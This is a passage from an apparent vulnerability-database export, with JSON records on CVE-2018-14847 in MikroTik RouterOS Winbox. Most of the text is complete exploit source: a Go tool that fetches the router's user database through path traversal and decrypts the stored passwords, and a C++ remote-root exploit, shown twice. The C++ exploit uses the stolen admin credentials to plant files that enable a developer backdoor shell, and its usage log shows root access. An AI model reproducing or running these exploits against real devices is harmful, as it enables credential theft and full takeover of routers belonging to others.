net.DialTimeout(\"tcp\", os.Args[1]+\":8291\", time.Duration(3*time.Second))\n\n\tif err != nil {\n\t\tfmt.Println(err.Error())\n\t\treturn\n\t}\n\n\tdefer conn.Close()\n\n\tconn.Write(a)\n\treqLen, err := conn.Read(buf)\n\tcheckErr(err)\n\tif reqLen < 38 {\n\t\tpanic(\"First packet is too small\")\n\t}\n\n\tb[19] = buf[38]\n\n\tconn.Write(b)\n\treqLen, err = conn.Read(buf)\n\tcheckErr(err)\n\tdb := buf[:reqLen]\n\n\ts := extractPass(db)\n\tfor i, acc := range s {\n\t\tdata := strings.SplitN(acc, \":\", 2)\n\t\tfmt.Printf(\" [%d] %s\\t%s\\n\", i, data[0], data[1])\n\t}\n}", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-04-01T19:04:31", "description": "\nMicroTik RouterOS 6.43rc3 - Remote Root", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2018-10-10T00:00:00", "type": "exploitpack", "title": "MicroTik RouterOS 6.43rc3 - Remote Root", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2018-10-10T00:00:00", "id": "EXPLOITPACK:71B40F77201BD20B165A2CC309F0C281", "href": "", "sourceData": "/*\n# Exploit Title: RouterOS Remote Rooting\n# Date: 10/07/2018\n# Exploit Author: Jacob Baines\n# Vendor Homepage: www.mikrotik.com\n# Software Link: https://mikrotik.com/download\n# Version: Longterm: 6.30.1 - 6.40.7 Stable: 6.29 - 6.42 Beta: 6.29rc1 - 6.43rc3\n# Tested on: RouterOS Various\n# CVE : CVE-2018-14847\n\nBy the Way is an exploit coded in C++ that enables a root shell on Mikrotik devices running RouterOS versions:\n\nLongterm: 6.30.1 - 6.40.7\nStable: 6.29 - 6.42\nBeta: 6.29rc1 - 6.43rc3\n\nThe exploit can be found here: https://github.com/tenable/routeros/tree/master/poc/bytheway\n\nThe exploit leverages the path traversal vulnerability CVE-2018-14847 to extract the admin password and create an \"option\" package to enable the developer backdoor. Post exploitation the attacker can connect to Telnet or SSH using the root user \"devel\" with the admin's password.\n\nMikrotik patched CVE-2018-14847 back in April. However, until this PoC was written, I don't believe its been publicly disclosed that the attack can be levegered to write files. You can find Mikrotik's advisory here:\n\nhttps://blog.mikrotik.com/security/winbox-vulnerability.html\n\nNote that, while this exploit is written for Winbox, it could be ported to HTTP as long as you had prior knowledge of the admin credentials.\n\n# Usage Example\n\nalbinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251\nTrying 192.168.1.251...\nConnected to 192.168.1.251.\nEscape character is '^]'.\nPassword: \nLogin failed, incorrect username or password\n\nConnection closed by foreign host.\nalbinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251\n\n \u2554\u2557 \u252c \u252c \u250c\u252c\u2510\u252c \u252c\u250c\u2500\u2510 \u2566 \u2566\u250c\u2500\u2510\u252c \u252c\n \u2560\u2569\u2557\u2514\u252c\u2518 \u2502 \u251c\u2500\u2524\u251c\u2524 \u2551\u2551\u2551\u251c\u2500\u2524\u2514\u252c\u2518\n \u255a\u2550\u255d \u2534 \u2534 \u2534 \u2534\u2514\u2500\u2518 \u255a\u2569\u255d\u2534 \u2534 \u2534 \n\n[+] Extracting passwords from 192.168.1.251:8291\n[+] Searching for administrator credentials \n[+] Using credentials - admin:lol\n[+] Creating /pckg/option on 192.168.1.251:8291\n[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291\n[+] There's a light on\nalbinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251\nTrying 192.168.1.251...\nConnected to 192.168.1.251.\nEscape character is '^]'.\nPassword: \n\n\nBusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)\nEnter 'help' for a list of built-in commands.\n\n# uname -a\nLinux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown\n# cat /rw/logs/VERSION\nv6.38.4 Mar/08/2017 09:26:17\n# Connection closed by foreign host.\n*/\n#include <sstream>\n#include <cstdlib>\n#include <iostream>\n#include <boost/cstdint.hpp>\n#include <boost/program_options.hpp>\n\n#include \"winbox_session.hpp\"\n#include \"winbox_message.hpp\"\n#include \"md5.hpp\"\n\nnamespace\n{\n const char s_version[] = \"By the Way 1.0.0\";\n\n /*!\n * Parses the command line arguments. The program will always use two\n * parameters (ip and winbox port) but the port will default to 8291 if\n * not present on the CLI\n *\n * \\param[in] p_arg_count the number of arguments on the command line\n * \\param[in] p_arg_array the arguments passed on the command line\n * \\param[in,out] p_ip the ip address to connect to\n * \\param[in,out] p_winbox_port the winbox port to connect to\n * \\return true if we have valid ip and ports. false otherwise.\n */\n bool parseCommandLine(int p_arg_count, const char* p_arg_array[],\n std::string& p_ip, std::string& p_winbox_port)\n {\n boost::program_options::options_description description(\"options\");\n description.add_options()\n (\"help,h\", \"A list of command line options\")\n (\"version,v\", \"Display version information\")\n (\"winbox-port,w\", boost::program_options::value<std::string>()->default_value(\"8291\"), \"The winbox port\")\n (\"ip,i\", boost::program_options::value<std::string>(), \"The ip to connect to\");\n\n boost::program_options::variables_map argv_map;\n try\n {\n boost::program_options::store(\n boost::program_options::parse_command_line(\n p_arg_count, p_arg_array, description), argv_map);\n }\n catch (const std::exception& e)\n {\n std::cerr << e.what() << \"\\n\" << std::endl;\n std::cerr << description << std::endl;\n return false;\n }\n\n boost::program_options::notify(argv_map);\n if (argv_map.empty() || argv_map.count(\"help\"))\n {\n std::cerr << description << std::endl;\n return false;\n }\n\n if (argv_map.count(\"version\"))\n {\n std::cerr << \"Version: \" << ::s_version << std::endl;\n return false;\n }\n\n if (argv_map.count(\"ip\") && argv_map.count(\"winbox-port\"))\n {\n p_ip.assign(argv_map[\"ip\"].as<std::string>());\n p_winbox_port.assign(argv_map[\"winbox-port\"].as<std::string>());\n return true;\n }\n else\n {\n std::cerr << description << std::endl;\n }\n\n return false;\n }\n\n /*!\n * This function uses the file disclosure vulnerability, CVE-2018-14847, to\n * download the user database from /flash/rw/store/user.dat\n *\n * \\param[in] p_ip the address of the router to connect to\n * \\param[in] p_winbox_port the winbox port to connect to\n * \\return a string containing the user.dat data or an empty string on error\n */\n std::string getPasswords(const std::string& p_ip, const std::string& p_winbox_port)\n {\n std::cout << \"[+] Extracting passwords from \" << p_ip << \":\" << p_winbox_port << std::endl;\n Winbox_Session winboxSession(p_ip, p_winbox_port);\n if (!winboxSession.connect())\n {\n std::cerr << \"[!] Failed to connect to the remote host\" << std::endl;\n return std::string();\n }\n\n WinboxMessage msg;\n msg.set_to(2, 2);\n msg.set_command(7);\n msg.set_request_id(1);\n msg.set_reply_expected(true);\n msg.add_string(1, \"//./.././.././../flash/rw/store/user.dat\");\n winboxSession.send(msg);\n\n msg.reset();\n if (!winboxSession.receive(msg))\n {\n std::cerr << \"[!] Error receiving an open file response.\" << std::endl;\n return std::string();\n }\n\n boost::uint32_t sessionID = msg.get_session_id();\n boost::uint16_t file_size = msg.get_u32(2);\n if (file_size == 0)\n {\n std::cerr << \"[!] File size is 0\" << std::endl;\n return std::string();\n }\n\n msg.reset();\n msg.set_to(2, 2);\n msg.set_command(4);\n msg.set_request_id(2);\n msg.set_reply_expected(true);\n msg.set_session_id(sessionID);\n msg.add_u32(2, file_size);\n winboxSession.send(msg);\n\n msg.reset();\n if (!winboxSession.receive(msg))\n {\n std::cerr << \"[!] Error receiving a file content response.\" << std::endl;\n return std::string();\n }\n\n return msg.get_raw(0x03);\n }\n\n /*!\n * Looks through the user.dat file for an enabled administrative account that\n * we can use. Once a useful account is found the password is decrypted.\n *\n * \\param[in] p_user_dat the user.dat file data\n * \\param[in,out] p_username stores the found admin username\n * \\param[in,out] p_password stores the found admin password\n * \\return true on success and false otherwrise\n */\n bool get_password(const std::string p_user_dat, std::string& p_username, std::string& p_password)\n {\n std::cout << \"[+] Searching for administrator credentials \" << std::endl;\n\n // the dat file is a series of nv::messages preceded by a two byte length\n std::string dat(p_user_dat);\n while (dat.size() > 4)\n {\n boost::uint16_t length = *reinterpret_cast<const boost::uint16_t*>(&dat[0]);\n if (dat[2] != 'M' || dat[3] != '2')\n {\n // this is mild insanity but the .dat file messages don't line\n // up properly if a new user is added or whatever.\n dat.erase(0, 1);\n continue;\n }\n dat.erase(0, 4);\n length -= 4;\n\n if (length > dat.size())\n {\n return false;\n }\n\n std::string entry(dat.data(), length);\n dat.erase(0, length);\n\n WinboxMessage msg;\n msg.parse_binary(entry);\n\n // we need an active admin account\n // 0x2 has three groups: 1 (read), 2 (write), 3 (full)\n if (msg.get_u32(2) == 3 && msg.get_boolean(0xfe000a) == false)\n {\n p_username.assign(msg.get_string(1));\n\n std::string encrypted_pass(msg.get_string(0x11));\n if (!encrypted_pass.empty() && msg.get_u32(0x1f) != 0)\n {\n std::string hash_this(p_username);\n hash_this.append(\"283i4jfkai3389\");\n\n MD5 md5;\n md5.update(hash_this.c_str(), hash_this.size());\n md5.finalize();\n std::string md5_hash(md5.getDigest());\n\n for (std::size_t i = 0; i < encrypted_pass.size(); i++)\n {\n boost::uint8_t decrypted = encrypted_pass[i] ^ md5_hash[i % md5_hash.size()];\n if (decrypted == 0)\n {\n // a null terminator! We did it.\n return true;\n }\n p_password.push_back(decrypted);\n }\n p_password.clear();\n }\n }\n }\n return false;\n }\n}\n\n/*!\n * This function creates the file /pckg/option on the target. This will enable\n * the developer login on Telnet and SSH. Oddly, you'll first need to log in\n * to Telnet for SSH to work, but I digress...\n *\n * \\param[in] p_ip the ip address of the router\n * \\param[in] p_port the port of the jsproxy we'll connect to\n * \\param[in] p_username the username we'll authenticate with\n * \\param[in] p_password the password we'll authenticate with\n * \\return true if we successfully created the file.\n */\nbool create_file(const std::string& p_ip, const std::string& p_port,\n const std::string& p_username, const std::string& p_password)\n{\n Winbox_Session mproxy_session(p_ip, p_port);\n if (!mproxy_session.connect())\n {\n std::cerr << \"[-] Failed to connect to the remote host\" << std::endl;\n return false;\n }\n\n boost::uint32_t p_session_id = 0;\n if (!mproxy_session.login(p_username, p_password, p_session_id))\n {\n std::cerr << \"[-] Login failed.\" << std::endl;\n return false;\n }\n\n std::cout << \"[+] Creating /pckg/option on \" << p_ip << \":\" << p_port << std::endl;\n\n WinboxMessage msg;\n msg.set_to(2, 2);\n msg.set_command(1);\n msg.set_request_id(1);\n msg.set_reply_expected(true);\n msg.set_session_id(p_session_id);\n msg.add_string(1, \"//./.././.././../pckg/option\");\n mproxy_session.send(msg);\n\n msg.reset();\n mproxy_session.receive(msg);\n if (msg.has_error())\n {\n std::cout << \"[-] \" << msg.get_error_string() << std::endl;\n return false;\n }\n\n std::cout << \"[+] Creating /flash/nova/etc/devel-login on \" << p_ip << \":\" << p_port << std::endl;\n msg.reset();\n msg.set_to(2, 2);\n msg.set_command(1);\n msg.set_request_id(2);\n msg.set_reply_expected(true);\n msg.set_session_id(p_session_id);\n msg.add_string(1, \"//./.././.././../flash/nova/etc/devel-login\");\n mproxy_session.send(msg);\n\n msg.reset();\n mproxy_session.receive(msg);\n if (msg.has_error())\n {\n std::cout << \"[-] \" << msg.get_error_string() << std::endl;\n return false;\n }\n\n return true;\n}\n\nint main(int p_argc, const char** p_argv)\n{\n std::string ip;\n std::string winbox_port;\n if (!parseCommandLine(p_argc, p_argv, ip, winbox_port))\n {\n return EXIT_FAILURE;\n }\n\n std::cout << std::endl;\n std::cout << \" \u2554\u2557 \u252c \u252c \u250c\u252c\u2510\u252c \u252c\u250c\u2500\u2510 \u2566 \u2566\u250c\u2500\u2510\u252c \u252c\" << std::endl;\n std::cout << \" \u2560\u2569\u2557\u2514\u252c\u2518 \u2502 \u251c\u2500\u2524\u251c\u2524 \u2551\u2551\u2551\u251c\u2500\u2524\u2514\u252c\u2518\" << std::endl;\n std::cout << \" \u255a\u2550\u255d \u2534 \u2534 \u2534 \u2534\u2514\u2500\u2518 \u255a\u2569\u255d\u2534 \u2534 \u2534 \" << std::endl;\n std::cout << std::endl;\n\n // step one - do the file disclosure\n std::string user_dat(getPasswords(ip, winbox_port));\n if (user_dat.empty())\n {\n return EXIT_FAILURE;\n }\n\n // step two - parse the password\n std::string admin_username;\n std::string admin_password;\n if (!get_password(user_dat, admin_username, admin_password))\n {\n std::cout << \"[-] Failed to find admin creds. Trying default.\" << std::endl;\n admin_username.assign(\"admin\");\n admin_password.assign(\"\");\n }\n\n std::cout << \"[+] Using credentials - \" << admin_username << \":\" << admin_password << std::endl;\n\n // step three - create the file\n if (!create_file(ip, winbox_port, admin_username, admin_password))\n {\n return EXIT_FAILURE;\n }\n\n std::cout << \"[+] There's a light on\" << std::endl;\n return EXIT_SUCCESS;\n}", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "exploitdb": [{"lastseen": "2023-08-07T07:53:59", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2018-08-17T00:00:00", "type": "exploitdb", "title": "Mikrotik WinBox 6.42 - Credential Disclosure (golang)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2018-08-17T00:00:00", "id": "EDB-ID:45209", "href": "https://www.exploit-db.com/exploits/45209", "sourceData": "/*\r\n\r\n# Title: Mikrotik WinBox 6.42 - Credential Disclosure ( golang edition )\r\n# Author: Maxim Yefimenko ( @slider )\r\n# Date: 2018-08-06\r\n# Sotware Link: https://mikrotik.com/download\r\n# Vendor Page: https://www.mikrotik.com/\r\n# Version: 6.29 - 6.42\r\n# Tested on: Fedora 28 \\ Debian 9 \\ Windows 10 \\ Android ( wherever it was possible to compile.. it's golang ^_^ )\r\n# CVE: CVE-2018-14847\r\n# References:\r\n# ( Alireza Mosajjal ) https://github.com/mosajjal https://n0p.me/winbox-bug-dissection/\r\n# ( BasuCert ) https://github.com/BasuCert/WinboxPoC\r\n# ( manio ) https://github.com/manio/mtpass/blob/master/mtpass.cpp\r\n# and special thanks to Dmitriy_Area51\r\n\r\n*/\r\n\r\npackage main\r\n\r\nimport (\r\n\t\"crypto/md5\"\r\n\t\"fmt\"\r\n\t\"net\"\r\n\t\"os\"\r\n\t\"strings\"\r\n\t\"time\"\r\n)\r\n\r\nvar (\r\n\ta = []byte{0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,\r\n\t\t0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,\r\n\t\t0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,\r\n\t\t0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,\r\n\t\t0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,\r\n\t\t0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,\r\n\t\t0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,\r\n\t\t0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,\r\n\t\t0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,\r\n\t\t0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,\r\n\t\t0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n\t\t0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,\r\n\t\t0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,\r\n\t\t0x00, 0x00}\r\n\r\n\tb = []byte{0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,\r\n\t\t0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,\r\n\t\t0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08,\r\n\t\t0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,\r\n\t\t0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,\r\n\t\t0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,\r\n\t\t0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,\r\n\t\t0x00, 0x02, 0x00, 0x00, 0x00}\r\n\r\n\tbuf = make([]byte, 1024*8)\r\n)\r\n\r\nfunc checkErr(err error) {\r\n\tif err != nil {\r\n\t\tfmt.Println(\"Error:\" + err.Error())\r\n\t}\r\n}\r\n\r\nfunc decryptPassword(user []byte, passEnc []byte) string {\r\n\tvar passw []byte\r\n\thasher := md5.New()\r\n\thasher.Write(user)\r\n\thasher.Write([]byte(\"283i4jfkai3389\"))\r\n\tkey := hasher.Sum(nil)\r\n\r\n\tfor i := 0; i < len(passEnc); i++ {\r\n\t\tpassw = append(passw, passEnc[i]^key[i%len(key)])\r\n\t}\r\n\r\n\treturn string(ASCIIonly(passw))\r\n}\r\n\r\nfunc ASCIIonly(s []byte) []byte {\r\n\tfor i, c := range s {\r\n\t\tif c < 32 || c > 126 {\r\n\t\t\treturn s[:i]\r\n\t\t}\r\n\t}\r\n\treturn s\r\n}\r\n\r\nfunc extractPass(buff []byte) (s []string) {\r\n\tvar (\r\n\t\tusr []byte\r\n\t\tpwd []byte\r\n\t)\r\n\r\n\t//searching for StartOfRecord\r\n\tfor i := 0; i < len(buff); i++ {\r\n\r\n\t\tif i+2 >= len(buff) {\r\n\t\t\tbreak\r\n\t\t}\r\n\r\n\t\tif (buff[i] == 0x4d) && (buff[i+1] == 0x32) && (buff[i+2] == 0x0a || buff[i+2] == 0x10) {\r\n\t\t\t// fmt.Printf(\"Probably user record at offset 0x%.5x\\n\", i)\r\n\r\n\t\t\t//some bytes ahead is enable/disable flag\r\n\t\t\ti += int((buff[i+2] - 5))\r\n\t\t\tif i >= len(buff) {\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\r\n\t\t\t//searching for StartOfRecNumber\r\n\t\t\tif i+3 >= len(buff) {\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\r\n\t\t\tfor !((buff[i] == 0x01) && ((buff[i+1] == 0x00) || (buff[i+1] == 0x20)) && (buff[i+3] == 0x09 || buff[i+3] == 0x20)) {\r\n\t\t\t\ti++\r\n\t\t\t\tif i+3 >= len(buff) {\r\n\t\t\t\t\tbreak\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\ti += 4\r\n\t\t\tif i >= len(buff) {\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\t\t\t// fmt.Printf(\"SORn: 0x%X\\n\", i)\r\n\r\n\t\t\t// comment?\r\n\t\t\ti += 18\r\n\t\t\tif (i + 4) >= len(buff) {\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\t\t\tif (!((buff[i+1] == 0x11) && (buff[i+2] == 0x20) && (buff[i+3] == 0x20) && (buff[i+4] == 0x21))) && (buff[i-5] == 0x03 && (buff[i] != 0x00)) {\r\n\t\t\t\tif (i+1)+int(buff[i]) >= len(buff) {\r\n\t\t\t\t\tbreak\r\n\t\t\t\t}\r\n\t\t\t\ti += int(buff[i])\r\n\t\t\t} else {\r\n\t\t\t\ti -= 18\r\n\t\t\t}\r\n\r\n\t\t\t//searching for StartOfPassword\r\n\t\t\tif i+4 >= len(buff) {\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\r\n\t\t\tfor !((buff[i] == 0x11) && (buff[i+3] == 0x21) && ((buff[i+4] % byte(0x10)) == 0)) {\r\n\t\t\t\ti++\r\n\t\t\t\tif i+4 >= len(buff) {\r\n\t\t\t\t\tbreak\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\ti += 5\r\n\t\t\tif (i + 3) >= len(buff) {\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\r\n\t\t\tif (buff[i-1] != 0x00) && !((buff[i] == 0x01) && ((buff[i+1] == 0x20 && buff[i+2] == 0x20) || (buff[i+1] == 0x00 && buff[i+2] == 0x00)) && (buff[i+3] == 0x21)) {\r\n\t\t\t\tpwd = buf[i-1+1 : int(buf[i-1])+i-1+1]\r\n\t\t\t\ti += int(buff[i-1])\r\n\t\t\t}\r\n\r\n\t\t\t//searching for StartOfUsername\r\n\t\t\tif i+3 >= len(buff) {\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\t\t\tfor !((buff[i] == 0x01) && (buff[i+3] == 0x21)) {\r\n\t\t\t\ti++\r\n\t\t\t\tif i+3 >= len(buff) {\r\n\t\t\t\t\tbreak\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\ti += 4\r\n\t\t\tif i >= len(buff) {\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\t\t\tif buff[i] != 0x00 {\r\n\t\t\t\tif i+int(buff[i]) >= len(buff) {\r\n\t\t\t\t\tbreak\r\n\t\t\t\t}\r\n\r\n\t\t\t\tusr = ASCIIonly(buff[i+1 : int(buff[i])+i+1])\r\n\t\t\t\ti += int(buff[i])\r\n\t\t\t}\r\n\r\n\t\t\tdecrypted := decryptPassword(usr, pwd)\r\n\t\t\t//fmt.Printf(\" --> %s\\t%s\\n\", buff[i], decrypted)\r\n\r\n\t\t\tif len(usr) != 0 {\r\n\t\t\t\ts = append(s, strings.Join([]string{string(usr), string(decrypted)}, \":\"))\r\n\t\t\t}\r\n\r\n\t\t}\r\n\t}\r\n\r\n\treturn s\r\n}\r\n\r\nfunc main() {\r\n\r\n\tif len(os.Args) < 2 {\r\n\t\tfmt.Printf(\" [ usage: %s 192.168.88.1\\n\\n\", os.Args[0])\r\n\t\tos.Exit(0)\r\n\t}\r\n\r\n\tconn, err := net.DialTimeout(\"tcp\", os.Args[1]+\":8291\", time.Duration(3*time.Second))\r\n\r\n\tif err != nil {\r\n\t\tfmt.Println(err.Error())\r\n\t\treturn\r\n\t}\r\n\r\n\tdefer conn.Close()\r\n\r\n\tconn.Write(a)\r\n\treqLen, err := conn.Read(buf)\r\n\tcheckErr(err)\r\n\tif reqLen < 38 {\r\n\t\tpanic(\"First packet is too small\")\r\n\t}\r\n\r\n\tb[19] = buf[38]\r\n\r\n\tconn.Write(b)\r\n\treqLen, err = conn.Read(buf)\r\n\tcheckErr(err)\r\n\tdb := buf[:reqLen]\r\n\r\n\ts := extractPass(db)\r\n\tfor i, acc := range s {\r\n\t\tdata := strings.SplitN(acc, \":\", 2)\r\n\t\tfmt.Printf(\" [%d] %s\\t%s\\n\", i, data[0], data[1])\r\n\t}\r\n}", "sourceHref": "https://www.exploit-db.com/raw/45209", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-08-07T06:32:10", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2018-10-10T00:00:00", "type": "exploitdb", "title": "MicroTik RouterOS &lt; 6.43rc3 - Remote Root", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2018-14847", "CVE-2018-14847"], "modified": "2018-10-10T00:00:00", "id": "EDB-ID:45578", "href": "https://www.exploit-db.com/exploits/45578", "sourceData": "/*\r\n# Exploit Title: RouterOS Remote Rooting\r\n# Date: 10/07/2018\r\n# Exploit Author: Jacob Baines\r\n# Vendor Homepage: www.mikrotik.com\r\n# Software Link: https://mikrotik.com/download\r\n# Version: Longterm: 6.30.1 - 6.40.7 Stable: 6.29 - 6.42 Beta: 6.29rc1 - 6.43rc3\r\n# Tested on: RouterOS Various\r\n# CVE : CVE-2018-14847\r\n\r\nBy the Way is an exploit coded in C++ that enables a root shell on Mikrotik devices running RouterOS versions:\r\n\r\nLongterm: 6.30.1 - 6.40.7\r\nStable: 6.29 - 6.42\r\nBeta: 6.29rc1 - 6.43rc3\r\n\r\nThe exploit can be found here: https://github.com/tenable/routeros/tree/master/poc/bytheway\r\n\r\nThe exploit leverages the path traversal vulnerability CVE-2018-14847 to extract the admin password and create an \"option\" package to enable the developer backdoor. Post exploitation the attacker can connect to Telnet or SSH using the root user \"devel\" with the admin's password.\r\n\r\nMikrotik patched CVE-2018-14847 back in April. However, until this PoC was written, I don't believe its been publicly disclosed that the attack can be levegered to write files. You can find Mikrotik's advisory here:\r\n\r\nhttps://blog.mikrotik.com/security/winbox-vulnerability.html\r\n\r\nNote that, while this exploit is written for Winbox, it could be ported to HTTP as long as you had prior knowledge of the admin credentials.\r\n\r\n# Usage Example\r\n\r\nalbinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251\r\nTrying 192.168.1.251...\r\nConnected to 192.168.1.251.\r\nEscape character is '^]'.\r\nPassword: \r\nLogin failed, incorrect username or password\r\n\r\nConnection closed by foreign host.\r\nalbinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251\r\n\r\n \u2554\u2557 \u252c \u252c \u250c\u252c\u2510\u252c \u252c\u250c\u2500\u2510 \u2566 \u2566\u250c\u2500\u2510\u252c \u252c\r\n \u2560\u2569\u2557\u2514\u252c\u2518 \u2502 \u251c\u2500\u2524\u251c\u2524 \u2551\u2551\u2551\u251c\u2500\u2524\u2514\u252c\u2518\r\n \u255a\u2550\u255d \u2534 \u2534 \u2534 \u2534\u2514\u2500\u2518 \u255a\u2569\u255d\u2534 \u2534 \u2534 \r\n\r\n[+] Extracting passwords from 192.168.1.251:8291\r\n[+] Searching for administrator credentials \r\n[+] Using credentials - admin:lol\r\n[+] Creating /pckg/option on 192.168.1.251:8291\r\n[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291\r\n[+] There's a light on\r\nalbinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251\r\nTrying 192.168.1.251...\r\nConnected to 192.168.1.251.\r\nEscape character is '^]'.\r\nPassword: \r\n\r\n\r\nBusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)\r\nEnter 'help' for a list of built-in commands.\r\n\r\n# uname -a\r\nLinux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown\r\n# cat /rw/logs/VERSION\r\nv6.38.4 Mar/08/2017 09:26:17\r\n# Connection closed by foreign host.\r\n*/\r\n#include <sstream>\r\n#include <cstdlib>\r\n#include <iostream>\r\n#include <boost/cstdint.hpp>\r\n#include <boost/program_options.hpp>\r\n\r\n#include \"winbox_session.hpp\"\r\n#include \"winbox_message.hpp\"\r\n#include \"md5.hpp\"\r\n\r\nnamespace\r\n{\r\n const char s_version[] = \"By the Way 1.0.0\";\r\n\r\n /*!\r\n * Parses the command line arguments. The program will always use two\r\n * parameters (ip and winbox port) but the port will default to 8291 if\r\n * not present on the CLI\r\n *\r\n * \\param[in] p_arg_count the number of arguments on the command line\r\n * \\param[in] p_arg_array the arguments passed on the command line\r\n * \\param[in,out] p_ip the ip address to connect to\r\n * \\param[in,out] p_winbox_port the winbox port to connect to\r\n * \\return true if we have valid ip and ports. 